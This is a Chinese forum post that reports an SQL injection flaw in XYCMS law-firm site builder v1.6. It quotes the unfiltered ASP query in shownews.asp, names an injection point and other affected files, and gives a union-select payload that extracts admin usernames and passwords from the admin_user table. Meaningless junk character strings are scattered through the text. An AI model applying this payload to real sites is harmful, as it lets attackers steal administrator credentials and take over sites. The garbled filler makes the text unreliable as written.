前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
5 X4 q; e7 w+ Q. ?$ S$ _. ^( ]
& [# U/ j* U, e! K! [+ T( k: ?* [淫荡分割线
. F8 U: x: @1 z W--------------------------------------------------------
+ _6 @- ^+ Z S3 |8 c$ V2 E9 X5 O$ { 7 y8 `/ F3 b* Q+ O
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)) h. M' a4 x% ]# t% Q8 ^5 p* A0 c4 u
源码地址:http://down.chinaz.com/soft/29233.htm: D' H; @% R( X
; D$ ?% h7 [" F漏洞文件:shownews.asp
) S) t/ `3 \* r1 ^漏洞代码:7-13行
2 U& g; N. Y* ^+ V/ D
4 b. Z& \+ R) H4 z7 x) I# ]1 T
# V/ C. v# }/ v* X+ n9 M/ M<% , }* F# Q- Y* |& k9 d' O
id=request.QueryString("id")
5 U( ~5 E& N3 g9 l. ] c9 _+ p / L( l+ O o6 A, t
set snews=server.createobject("adodb.recordset")
' n# j1 l0 @" uexec="select * from [news] where id="&id) F1 b: w4 _: C$ n6 ~8 e& H
snews.open exec,conn,1,1) J2 l0 t! Y) p5 U$ `
%>+ ?2 t% y9 U L* _' k! @+ J
! Z% o5 c! G( G 6 X8 d/ \) v' f$ d8 [
什么过滤都没有 直造成注入4 Q1 x' U4 |' D3 [" a3 e& r+ W
9 [& c' v6 S* [- i+ g! @! P注入点:http://127.0.0.1:99/shownews.asp?id=xx2 e- A* }; u: u y0 c8 G
; @- b4 j* _+ j! E& s
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
) W6 o7 N* R6 ?
* @% M* i/ R ~- N+ e" n, Q) N; L l
5 v! R; t; T& T$ A/ ?exp: union select 1,admin,password,4,5,7 from admin_user; ?5 h- `0 v p& t; M: _* M0 W
9 _; o# m2 o6 L+ d0 G0 v$ L
|
发表于 2013-4-4 17:28:12
收藏
支持
反对